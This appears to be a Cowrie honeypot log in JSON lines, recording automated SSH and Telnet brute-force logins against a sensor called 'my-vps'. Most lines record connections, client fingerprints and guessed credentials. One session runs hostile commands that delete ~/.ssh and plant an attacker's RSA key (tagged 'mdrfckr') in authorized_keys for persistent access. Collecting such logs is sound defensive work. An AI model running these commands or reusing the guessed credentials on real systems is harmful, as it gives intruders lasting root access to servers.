{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:21:37.068998Z","src_ip":"212.227.235.229","session":"f27e7e3d5a95"}
{"eventid":"cowrie.session.connect","src_ip":"183.234.64.3","src_port":24325,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ad1676aa971","protocol":"ssh","message":"New connection: 183.234.64.3:24325 (1.2.3.4:22) [session: 8ad1676aa971]","sensor":"my-vps","timestamp":"2025-08-28T06:21:37.641467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:21:37.644098Z","src_ip":"183.234.64.3","session":"8ad1676aa971"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-28T06:21:37.826978Z","src_ip":"212.227.235.229","session":"f27e7e3d5a95"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:21:37.872491Z","src_ip":"183.234.64.3","session":"8ad1676aa971"}
{"eventid":"cowrie.login.success","username":"root","password":"Reza1","message":"login attempt [root/Reza1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:21:38.793277Z","src_ip":"183.234.64.3","session":"8ad1676aa971"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:21:39.079042Z","src_ip":"212.227.235.229","session":"f27e7e3d5a95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:21:39.338943Z","src_ip":"183.234.64.3","session":"8ad1676aa971"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:21:39.339651Z","src_ip":"183.234.64.3","session":"8ad1676aa971"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:21:39.340734Z","src_ip":"183.234.64.3","session":"8ad1676aa971"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:21:39.575766Z","src_ip":"183.234.64.3","session":"8ad1676aa971"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:21:40.059077Z","src_ip":"183.234.64.3","session":"8ad1676aa971"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T06:21:40.059794Z","src_ip":"183.234.64.3","session":"8ad1676aa971"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T06:21:40.293368Z","src_ip":"183.234.64.3","session":"8ad1676aa971"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:21:40.294456Z","src_ip":"183.234.64.3","session":"8ad1676aa971"}
{"eventid":"cowrie.session.connect","src_ip":"183.234.64.3","src_port":24685,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9cb9355a73e","protocol":"ssh","message":"New connection: 183.234.64.3:24685 (1.2.3.4:22) [session: b9cb9355a73e]","sensor":"my-vps","timestamp":"2025-08-28T06:21:40.519654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:21:40.523678Z","src_ip":"183.234.64.3","session":"b9cb9355a73e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:21:40.751908Z","src_ip":"183.234.64.3","session":"b9cb9355a73e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T06:21:41.669830Z","src_ip":"183.234.64.3","session":"b9cb9355a73e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:21:42.907662Z","src_ip":"183.234.64.3","session":"b9cb9355a73e"}
{"eventid":"cowrie.session.connect","src_ip":"183.234.64.3","src_port":25006,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3c0ef0f8fee","protocol":"ssh","message":"New connection: 183.234.64.3:25006 (1.2.3.4:22) [session: d3c0ef0f8fee]","sensor":"my-vps","timestamp":"2025-08-28T06:21:43.136582Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:21:43.138111Z","src_ip":"183.234.64.3","session":"d3c0ef0f8fee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:21:43.371636Z","src_ip":"183.234.64.3","session":"d3c0ef0f8fee"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:21:44.294196Z","src_ip":"183.234.64.3","session":"d3c0ef0f8fee"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:21:44.527706Z","src_ip":"183.234.64.3","session":"d3c0ef0f8fee"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:21:44.528741Z","src_ip":"183.234.64.3","session":"8ad1676aa971"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37592,"dst_ip":"1.2.3.4","dst_port":22,"session":"b947807f15b9","protocol":"ssh","message":"New connection: 212.227.125.160:37592 (1.2.3.4:22) [session: b947807f15b9]","sensor":"my-vps","timestamp":"2025-08-28T06:21:46.533922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:21:46.534904Z","src_ip":"212.227.125.160","session":"b947807f15b9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:21:46.762724Z","src_ip":"212.227.125.160","session":"b947807f15b9"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"123456","message":"login attempt [lighthouse/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:21:47.417983Z","src_ip":"212.227.125.160","session":"b947807f15b9"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:21:48.637680Z","src_ip":"212.227.125.160","session":"b947807f15b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42648,"dst_ip":"1.2.3.4","dst_port":22,"session":"04aa40655caa","protocol":"ssh","message":"New connection: 212.227.235.229:42648 (1.2.3.4:22) [session: 04aa40655caa]","sensor":"my-vps","timestamp":"2025-08-28T06:21:53.117398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:21:53.118769Z","src_ip":"212.227.235.229","session":"04aa40655caa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:21:53.370300Z","src_ip":"212.227.235.229","session":"04aa40655caa"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"123456","message":"login attempt [lighthouse/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:21:54.125334Z","src_ip":"212.227.235.229","session":"04aa40655caa"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":34252,"dst_ip":"1.2.3.4","dst_port":23,"session":"60a6476e54b4","protocol":"telnet","message":"New connection: 8.222.212.69:34252 (1.2.3.4:23) [session: 60a6476e54b4]","sensor":"my-vps","timestamp":"2025-08-28T06:21:54.915631Z"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:21:55.377948Z","src_ip":"212.227.235.229","session":"04aa40655caa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38098,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d886c0a3a9e","protocol":"ssh","message":"New connection: 212.227.125.160:38098 (1.2.3.4:22) [session: 0d886c0a3a9e]","sensor":"my-vps","timestamp":"2025-08-28T06:22:02.965420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:22:02.966480Z","src_ip":"212.227.125.160","session":"0d886c0a3a9e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:22:03.183380Z","src_ip":"212.227.125.160","session":"0d886c0a3a9e"}
{"eventid":"cowrie.login.failed","username":"flask","password":"12345678","message":"login attempt [flask/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T06:22:03.832608Z","src_ip":"212.227.125.160","session":"0d886c0a3a9e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:22:05.051282Z","src_ip":"212.227.125.160","session":"0d886c0a3a9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32850,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4ae82d3dba4","protocol":"ssh","message":"New connection: 212.227.235.229:32850 (1.2.3.4:22) [session: b4ae82d3dba4]","sensor":"my-vps","timestamp":"2025-08-28T06:22:09.483842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:22:09.484496Z","src_ip":"212.227.235.229","session":"b4ae82d3dba4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:22:09.732191Z","src_ip":"212.227.235.229","session":"b4ae82d3dba4"}
{"eventid":"cowrie.login.failed","username":"flask","password":"12345678","message":"login attempt [flask/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T06:22:10.477611Z","src_ip":"212.227.235.229","session":"b4ae82d3dba4"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:22:11.727118Z","src_ip":"212.227.235.229","session":"b4ae82d3dba4"}
{"eventid":"cowrie.session.connect","src_ip":"3.132.23.201","src_port":58918,"dst_ip":"1.2.3.4","dst_port":23,"session":"c493b0c3fb7b","protocol":"telnet","message":"New connection: 3.132.23.201:58918 (1.2.3.4:23) [session: c493b0c3fb7b]","sensor":"my-vps","timestamp":"2025-08-28T06:22:18.307490Z"}
{"eventid":"cowrie.session.closed","duration":0.18426179885864258,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:22:18.491676Z","src_ip":"3.132.23.201","session":"c493b0c3fb7b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63514,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7f2fa308ddf","protocol":"ssh","message":"New connection: 217.72.205.35:63514 (1.2.3.4:22) [session: b7f2fa308ddf]","sensor":"my-vps","timestamp":"2025-08-28T06:22:19.323071Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:22:19.324199Z","src_ip":"217.72.205.35","session":"b7f2fa308ddf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40954,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f4521803d2a","protocol":"ssh","message":"New connection: 212.227.125.160:40954 (1.2.3.4:22) [session: 3f4521803d2a]","sensor":"my-vps","timestamp":"2025-08-28T06:22:19.444027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:22:19.444752Z","src_ip":"212.227.125.160","session":"3f4521803d2a"}
